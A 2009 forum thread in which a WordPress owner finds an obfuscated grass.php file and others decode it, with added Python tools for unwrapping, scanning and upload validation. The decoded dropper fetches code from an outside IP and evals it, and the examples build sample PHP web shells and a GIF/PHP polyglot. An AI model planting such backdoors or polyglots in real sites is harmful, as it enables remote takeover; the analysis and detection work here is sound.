
Translate this hacker's code

Discussion in 'PHP' started by adacprogramming, Jun 9, 2009.

  1. #1
    A hacker managed to get a page added onto the root of one of my wordpress sites (not sure how yet)

    He added a page called grass.php. When you put a parameter in the URL,
    grass.php?p=9-6559, it seems to call up a page from another site and display it on my site under that URL.

    This is the code. It appears to be compressed. Can anyone uncompress this code so I can see what he is doing and the site he is getting his info from?
    {eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>
     
    adacprogramming, Jun 9, 2009 IP
  2. jestep

    jestep Prominent Member

    #2
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    
    $data=curl_exec($ch);
    curl_close($ch);
    eval(base64_decode($data));
    exit;
    
    
    Not sure what this returns, but the eval could allow it to execute just about any PHP command.
     
    jestep, Jun 9, 2009 IP
  3. jestep

    jestep Prominent Member

    #3
    If you want to be able to figure these out, just follow all the steps except the eval function.

    
    <?php 
    
    $string = gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ=='));
    
    ?>
    
    <textarea><?php echo $string; ?></textarea>
    
     
    jestep, Jun 9, 2009 IP
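The same "every step except the eval" approach, done statically so nothing in the blob ever runs. This is an added example and not code from the thread; the regex, the decoder table, the wrap() helper and the function names are this example's own choices, and the PHP text used as constructed sample input is the decoded dropper body from reply #2. It also peels nested layers (droppers are often wrapped several times) and pulls out the URL and function calls a responder wants first.

```python
"""Unwrap eval(gzinflate(base64_decode('...')))-style PHP droppers without running them.

Added example, not code from the thread. Does what jestep describes ("every step
except the eval") statically in Python. The regex, TRANSFORMS table and wrap()
helper are this example's own; INNER_PHP is the decoded body posted in reply #2.
"""
import base64
import codecs
import re
import zlib

# PHP decoder functions that droppers chain together, mapped to Python equivalents.
TRANSFORMS = {
    "base64_decode": lambda b: base64.b64decode(b),                      # junk bytes ignored, as in PHP
    "gzinflate":     lambda b: zlib.decompress(b, -zlib.MAX_WBITS),      # raw DEFLATE == PHP gzinflate()
    "gzuncompress":  lambda b: zlib.decompress(b),                       # zlib stream == PHP gzuncompress()
    "gzdecode":      lambda b: zlib.decompress(b, 16 + zlib.MAX_WBITS),  # gzip container == PHP gzdecode()
    "str_rot13":     lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev":        lambda b: b[::-1],
}

# eval( f1( f2( ... ('literal') ... ) ) );  -- any depth of wrappers around one quoted literal.
_EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:[A-Za-z_][A-Za-z0-9_]*\s*\(\s*)+)(['\"])([^'\"]*)\2\s*\)+\s*;?"
)


def unwrap(source: str, max_layers: int = 25) -> str:
    """Replace each eval(<decoders>('literal')) with its decoded text until none are left."""
    for _ in range(max_layers):
        m = _EVAL_RE.search(source)
        if m is None:
            return source
        chain = re.findall(r"[A-Za-z_][A-Za-z0-9_]*", m.group(1))  # outermost call first
        data = m.group(3).encode("latin-1")
        for fn in reversed(chain):  # PHP evaluates the innermost call first
            if fn not in TRANSFORMS:
                raise ValueError(f"unknown decoder in chain: {fn}()")
            data = TRANSFORMS[fn](data)
        source = source[: m.start()] + data.decode("latin-1") + source[m.end():]
    raise ValueError("too many nested layers; refusing to continue")


def extract_iocs(code: str) -> dict:
    """The indicators a responder wants first: URLs contacted and PHP functions called."""
    return {
        "urls": re.findall(r"https?://[^\s\"']+", code),
        "calls": sorted(set(re.findall(r"\b([A-Za-z_]\w*)\s*\(", code))),
    }


def wrap(php: str) -> str:
    """Build eval(gzinflate(base64_decode('...'))) around PHP text (only used to make sample input)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    blob = base64.b64encode(c.compress(php.encode("latin-1")) + c.flush()).decode("ascii")
    return f"eval(gzinflate(base64_decode('{blob}')));"


# Constructed sample: the dropper body jestep decoded, wrapped twice so unwrap() must peel two layers.
INNER_PHP = (
    "$ch = curl_init();"
    "curl_setopt($ch, CURLOPT_URL, \"http://78.109.23.240/dynuni5/?p=\".trim($_GET['p'])"
    ".\"&sn=\".urlencode($_SERVER['SERVER_NAME']));"
    "curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);"
    "$data=curl_exec($ch);curl_close($ch);eval(base64_decode($data));exit;"
)
SAMPLE = "<?php {" + wrap(wrap(INNER_PHP)) + "}?>"

# The blob actually pasted in the first post, for readers who want to run the decoder on it.
GRASS_PHP = (
    "{eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ru"
    "VRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTk"
    "tJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>"
)

if __name__ == "__main__":
    decoded = unwrap(SAMPLE)
    print(decoded)
    print(extract_iocs(decoded))
    try:
        print(unwrap(GRASS_PHP))
    except (ValueError, zlib.error) as exc:
        print("could not decode the pasted blob:", exc)
```

Two things to keep in mind when using this on real samples: the decoder only handles literals, so the second stage in grass.php (eval of whatever the remote server returns) has to be captured from network traffic or fetched separately, and never by running the script; and if unwrap() raises on an unknown function name, look the function up before adding it to TRANSFORMS, since droppers also use custom decoders defined earlier in the same file.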
  4. Vooler

    Vooler Well-Known Member

    #4
    Very simple: replace the eval with print and the job's done. Here is the code:

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    $data=curl_exec($ch);
    curl_close($ch);
    eval(base64_decode($data));
    exit;


    I hope it helps you solve the issue. Besides, show me your site and user input pages and I may look into it. Your script might have some security holes.
     
    Vooler, Jun 9, 2009 IP
  5. adacprogramming

    adacprogramming Well-Known Member

    #5
    Yes, that helps, thanks.

    I'm just using wordpress on www.thedigitaldomain.com

    This is a Windows server, not a Linux server. I'm wondering if a loophole was caused by PHP on a Windows server. This is the only site I have ever done that on; I've never had any problem with this version of WordPress on Linux servers.
     
    adacprogramming, Jun 9, 2009 IP
  6. jestep

    jestep Prominent Member

    #6
    It's hard to say how that got there. I would check for things like anonymous FTP, or directories/scripts with full permissions that aren't escaping user input.

    It takes a fairly big hole to put a script like this on a site. Very unlikely it was XSS. Was this pulled from a database, or did you find it hard coded? Also, many times plugin creators put these in their plugins to track or put a link to their site on a blog. Was this in a specific plugin?
     
    jestep, Jun 9, 2009 IP
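A triage script for the checks suggested above, added here as an example rather than anything posted in the thread. It walks a webroot and reports world-writable directories or files, PHP files whose contents look like a dropper or shell (eval of a decoded literal, eval or a system call on request input, fetch-then-eval as in grass.php), PHP anywhere under wp-content/uploads, and PHP modified recently. The regexes, category names and the constructed sample tree built by build_sample_webroot() are this example's own.

```python
"""Triage a WordPress webroot for dropped scripts and over-permissive paths.

Added example, not from the thread. Performs the checks jestep suggests
(world-writable paths, scripts that execute untrusted input) plus two
WordPress-specific ones (PHP under wp-content/uploads, recently modified PHP).
Regexes, category names and the sample tree are this example's own choices.
"""
import os
import re
import stat
import tempfile
import time

# Patterns that are almost never legitimate in a WordPress install.
SUSPICIOUS = [
    ("eval-of-decoded-literal",
     re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13|strrev)\s*\(", re.I)),
    ("eval-of-request-input",
     re.compile(r"eval\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("system-of-request-input",
     re.compile(r"\b(?:system|passthru|shell_exec|exec|popen)\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
]
PHP_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def world_writable(path: str) -> bool:
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def scan_file(path: str) -> list:
    """Return the names of the SUSPICIOUS patterns a PHP file matches."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")
    hits = [name for name, rx in SUSPICIOUS if rx.search(text)]
    # grass.php's shape: fetch something remote, then eval() it
    if re.search(r"\b(?:curl_exec|file_get_contents|fopen)\s*\(", text) and re.search(r"\beval\s*\(", text):
        hits.append("fetch-and-eval")
    return hits


def triage(webroot: str, recent_days: int = 7, now: float = None) -> dict:
    now = time.time() if now is None else now
    report = {"world_writable": [], "suspicious_php": {}, "php_in_uploads": [], "recent_php": []}
    for dirpath, _dirnames, filenames in os.walk(webroot):
        if world_writable(dirpath):
            report["world_writable"].append(os.path.relpath(dirpath, webroot))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot)
            if world_writable(path):
                report["world_writable"].append(rel)
            if not name.lower().endswith(PHP_EXT):
                continue
            if "uploads" in rel.split(os.sep):
                report["php_in_uploads"].append(rel)  # uploads must never hold executable PHP
            if now - os.lstat(path).st_mtime < recent_days * 86400:
                report["recent_php"].append(rel)
            hits = scan_file(path)
            if hits:
                report["suspicious_php"][rel] = hits
    return report


def build_sample_webroot() -> str:
    """Constructed sample tree: a clean index.php, the dropper at the root, a shell in uploads."""
    root = tempfile.mkdtemp(prefix="webroot-")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    os.chmod(uploads, 0o777)  # the over-permissive directory jestep warns about
    samples = {
        "index.php": "<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php'); ?>",
        "grass.php": "<?php {eval(gzinflate(base64_decode('x')));}?>",
        os.path.join("wp-content", "uploads", "image.php"): "<?php @eval($_REQUEST['c']); ?>",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    rep = triage(build_sample_webroot())
    for key, val in rep.items():
        print(f"{key}: {val}")
```

Run it against a copy of the webroot taken before anything is cleaned up, so the modification times survive; the recent_php list is what narrows the search once you know roughly when grass.php appeared. The regexes are deliberately narrow to keep the noise down, so a clean report is not proof of a clean site; the world-writable and uploads checks are the ones that matter for the "how did it get there" question.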
  7. adacprogramming

    adacprogramming Well-Known Member

    #7
    The scary part was that this was an actual page on the root of this domain, not just something in the database or in the plugin folder.
     
    adacprogramming, Jun 9, 2009 IP
  8. adacprogramming

    adacprogramming Well-Known Member

    #8
    Googling grass.php?p=9-6559 comes up with other sites that must have been hacked into at one time.
     
    adacprogramming, Jun 9, 2009 IP
  9. Vooler

    Vooler Well-Known Member

    #9
    grass.php seems to be the culprit then. Where does this file reside? Within the root of the WordPress blog?
    I never touched WordPress, but as per the hacker's code s/he has injected code some way through the query string.

    A second good guess may be the uploading feature enabled in your blog, where the script might be recognizing image uploads using getimagesize, and fake files have been uploaded with a GIF89a signature and the rest PHP code. Once a user is able to upload such a thing and can get to the uploaded path, s/he gets hold of everything.

    See if some patch for WordPress was released on nearby dates, and/or you might not have updated WordPress in a long time.

    All of this is just a good guess.

    Regards
     
    Vooler, Jun 9, 2009 IP
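The upload trick described in the post above, shown concretely. This is an added example and not code from the thread: it builds a constructed file that starts with a valid GIF89a header and carries PHP after it, then checks it two ways, a header-only check (the behaviour you get from trusting getimagesize() alone) and a stricter validator that also rejects double extensions such as shell.php.gif and script markers in the body. The function names, the marker list and the hypothetical filenames are this example's own.

```python
"""Why a getimagesize()-style check does not stop a GIF89a/PHP polyglot upload.

Added example, not from the thread. header_only_check() mirrors what trusting
getimagesize() gives you; strict_check() adds the constraints the header cannot
enforce. Names, markers and sample filenames are this example's own.
"""
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
SCRIPT_MARKERS = (b"<?", b"<script", b"<%")


def header_only_check(data: bytes):
    """What getimagesize() tells you: the header parses as a GIF, here are its dimensions."""
    if len(data) >= 10 and data[:6] in GIF_SIGNATURES:
        width, height = struct.unpack("<HH", data[6:10])
        return ("image/gif", width, height)
    return None


def strict_check(filename: str, data: bytes):
    """Header check plus the constraints the header check alone cannot enforce."""
    if header_only_check(data) is None:
        return False, "not a GIF header"
    if "\x00" in filename:
        return False, "null byte in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] != "gif":
        return False, "extension does not match the image type"
    if any(p in EXEC_EXTS for p in parts[1:-1]):
        return False, "executable extension hidden before .gif"  # e.g. shell.php.gif
    lowered = data.lower()
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            return False, f"script marker {marker!r} inside image data"
    return True, "ok"


def make_polyglot(php: bytes) -> bytes:
    """Constructed GIF89a/PHP polyglot: a 1x1 logical-screen header followed by PHP."""
    return b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00" + php


CLEAN_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00" + b"\x3b"  # header + trailer
POLYGLOT = make_polyglot(b"<?php eval(base64_decode($_POST['x'])); ?>")

if __name__ == "__main__":
    print("header only, polyglot:", header_only_check(POLYGLOT))
    print("strict, polyglot:     ", strict_check("avatar.gif", POLYGLOT))
    print("strict, double ext:   ", strict_check("avatar.php.gif", CLEAN_GIF))
    print("strict, clean:        ", strict_check("avatar.gif", CLEAN_GIF))
```

The marker scan can false-positive on a genuine image that happens to contain the bytes `<?`, and an attacker can still hide code in places a byte scan will not recognise, so treat it as a last line rather than the fix. The durable mitigations are the ones the check cannot replace: re-encode uploaded images with an image library before storing them, and configure the web server so that nothing under the uploads directory is ever handed to the PHP interpreter.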
  10. sssharlasss

    sssharlasss Peon

    #10
    I had something like that happen to one of my sites once. I read into it and found out that some Chinese hacking gang was the culprit. Weird, huh? I think it was a hole in my version of WordPress.
     
    sssharlasss, Jun 9, 2009 IP
  11. Gallabanga

    Gallabanga Peon

    #11
    Decodes to:

    }�]��@���"r4�վO�D��Ic]��Xlp�V�-�ߟ-��j����[(D�~+�TR���'o@W�vmQxh�ҿ��� �
    ���Oq?���F����]ɱ��C 뛼�6�vrj����O�L���Uf�z$�䴑G�=1d��C�0%,���(��~�v{��pb�<�Y�a� �M~���hkxd�{���x�o���R/�
     
    Gallabanga, Jun 9, 2009 IP
  12. Gallabanga

    Gallabanga Peon

    #12
    Most likely doesn't help :p
     
    Gallabanga, Jun 9, 2009 IP
  13. adacprogramming

    adacprogramming Well-Known Member

    #13
    Seems like the best guess is a hole in my WordPress script. I'll move up to the latest version later today.

    Thanks for everyone's input.
     
    adacprogramming, Jun 10, 2009 IP